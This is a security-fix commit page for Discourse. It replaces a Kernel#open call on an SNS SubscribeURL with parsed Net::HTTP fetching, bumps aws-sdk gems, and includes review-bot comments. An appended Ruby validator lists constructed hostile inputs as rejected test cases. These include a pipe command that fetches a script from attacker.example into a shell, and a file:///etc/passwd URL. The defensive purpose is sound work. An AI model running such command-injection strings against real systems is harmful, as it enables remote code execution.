SECURITY: Improve validation of SNS subscription confirm (#14671)

An upstream validation bug in the aws-sdk-sns library could enable RCE under certain circumstances. This commit updates the upstream gem, and adds additional validation to provide defense-in-depth.

diff --git a/Gemfile.lock b/Gemfile.lock
index 8c013d0..0e75936 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -53,8 +53,8 @@ GEM
       rake (>= 10.4, < 14.0)
     ast (2.4.2)
     aws-eventstream (1.2.0)
-    aws-partitions (1.432.0)
-    aws-sdk-core (3.112.1)
+    aws-partitions (1.516.0)
+    aws-sdk-core (3.121.2)
       aws-eventstream (~> 1, >= 1.0.2)
       aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
@@ -66,10 +66,10 @@ GEM
       aws-sdk-core (~> 3, >= 3.112.0)
       aws-sdk-kms (~> 1)
       aws-sigv4 (~> 1.1)
-    aws-sdk-sns (1.38.0)
-      aws-sdk-core (~> 3, >= 3.112.0)
+    aws-sdk-sns (1.46.0)
+      aws-sdk-core (~> 3, >= 3.121.2)
       aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.2.3)
+    aws-sigv4 (1.4.0)
       aws-eventstream (~> 1, >= 1.0.2)
     barber (0.12.2)
       ember-source (>= 1.0, < 3.1)
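Review bot: Neither this hunk nor the commit message records which aws-sdk-sns release fixed the validation bug, so a reader cannot tell whether 1.46.0 is the minimum safe version or simply the latest at the time; state the fixed version in the commit message and, if the Gemfile carries a constraint for aws-sdk-sns, raise its lower bound to match so a later `bundle update` cannot resolve back below it (the lockfile alone does not enforce that). The aws-sdk-core bump in the previous hunk is consistent with the new `aws-sdk-core (~> 3, >= 3.121.2)` requirement shown here.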
diff --git a/app/jobs/regular/confirm_sns_subscription.rb b/app/jobs/regular/confirm_sns_subscription.rb
index 0737470..f68588f 100644
--- a/app/jobs/regular/confirm_sns_subscription.rb
+++ b/app/jobs/regular/confirm_sns_subscription.rb
@@ -13,8 +13,13 @@ module Jobs
       require "aws-sdk-sns"
       return unless Aws::SNS::MessageVerifier.new.authentic?(raw)
 
-      # confirm subscription by visiting the URL
-      open(subscribe_url)
+      uri = begin
+        URI.parse(subscribe_url)
+      rescue URI::Error
+        return
+      end
+
+      Net::HTTP.get(uri)
     end
 
   end
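Review bot: The new code still hands any string that URI.parse accepts to Net::HTTP.get, so the `rescue URI::Error` branch is a weaker check than it looks: `http://...`, `file:///...`, and bare relative paths all parse without raising, and a URI::Generic with no host then fails inside Net::HTTP.get instead of returning cleanly. Since a genuine SubscribeURL is always an HTTPS URL on an SNS endpoint, add an explicit check before the fetch, e.g. `return unless uri.is_a?(URI::HTTPS) && uri.host` plus an allow-list on the host (the `sns.<region>.amazonaws.com` endpoints, and `.amazonaws.com.cn` if China regions matter). Removing `open(subscribe_url)` is the substantive fix: Kernel#open runs a string beginning with `|` as a command, so the old line was a command-execution sink for any SubscribeURL that got past the verifier, and the commit message should say so rather than leaving it as "additional validation". Two smaller points: `require "net/http"` is not visible next to the `require "aws-sdk-sns"` on the line above (it may be loaded transitively, but the job should require what it calls), and the silent `return` on a parse failure drops a signed message with no log line, which makes a misbehaving sender hard to diagnose.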

GitHub sha: 010309d1084d5ac54d9f62eefa7ef100721fd1c8

This commit appears in #14671 which was approved by danielwaterworth. It was merged by davidtaylorhq.
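As an added example (not code from this commit, from Discourse, or from the aws-sdk-sns gem), this is what the validation the commit message calls defense-in-depth looks like when carried one step further: parse the SubscribeURL, then require HTTPS and an SNS endpoint host before fetching it. The helper names and the host pattern are assumptions of the example, and the classifier for Kernel#open's behaviour documents why the removed `open(subscribe_url)` line mattered without executing anything.

```ruby
require "uri"
require "net/http"

# Added example, not code from Discourse or the aws-sdk-sns gem. Helper and
# constant names are hypothetical, and the SNS endpoint pattern is an
# assumption made for this example (regional sns.<region>.amazonaws.com
# endpoints, plus the .amazonaws.com.cn China partition).
SNS_HOST_PATTERN = /\Asns\.[a-z0-9-]+\.amazonaws\.com(\.cn)?\z/

# Classifies what Kernel#open would do with a string, without executing it.
# Kernel#open treats a leading "|" as a command to run and returns its pipe,
# which is why `open(subscribe_url)` on attacker-influenced input is a
# command-execution sink. With open-uri loaded, http(s):// strings are
# fetched; anything else is opened as a local file.
def legacy_open_behaviour(raw)
  return :shell_command if raw.start_with?("|")
  return :http_fetch if raw.match?(%r{\Ahttps?://}i)
  :local_file
end

# Returns a URI::HTTPS for an acceptable SubscribeURL, or nil for anything
# else. Parsing alone is not validation: URI.parse returns objects for
# "http://...", "file:///etc/passwd" and bare paths without raising, so the
# scheme, host and userinfo are checked explicitly.
def validated_subscribe_uri(raw)
  uri = begin
    URI.parse(raw)
  rescue URI::Error
    return nil
  end

  return nil unless uri.is_a?(URI::HTTPS)              # https only
  return nil if uri.host.nil? || uri.host.empty?
  return nil unless uri.host.downcase.match?(SNS_HOST_PATTERN)
  return nil unless uri.userinfo.nil?                  # no user@host tricks
  uri
end

# Confirms the subscription by fetching the validated URL. The HTTP call is
# injectable so the function can be exercised offline; the default performs a
# real GET with Net::HTTP, which never spawns a shell for its argument.
def confirm_subscription(raw, http_get: ->(uri) { Net::HTTP.get(uri) })
  uri = validated_subscribe_uri(raw)
  return :rejected if uri.nil?

  http_get.call(uri)
  :confirmed
end

if $PROGRAM_NAME == __FILE__
  # Constructed inputs: the first resembles a real SubscribeURL; the rest are
  # strings URI.parse accepts or that Kernel#open would have misused.
  [
    "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&Token=abc",
    "|curl attacker.example/x | sh",
    "http://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription",
    "https://sns.us-east-1.amazonaws.com.attacker.example/",
    "https://attacker.example@sns.us-east-1.amazonaws.com/",
    "file:///etc/passwd",
  ].each do |s|
    verdict = validated_subscribe_uri(s) ? "ACCEPT" : "REJECT"
    puts "#{legacy_open_behaviour(s).to_s.ljust(14)} #{verdict}  #{s}"
  end
end
```

Run as a script it prints, for each constructed input, what Kernel#open would have done beside what the validator decides. `confirm_subscription` takes the fetch as a lambda so a job can pass a client with explicit timeouts, and so the validation path can be tested without network access.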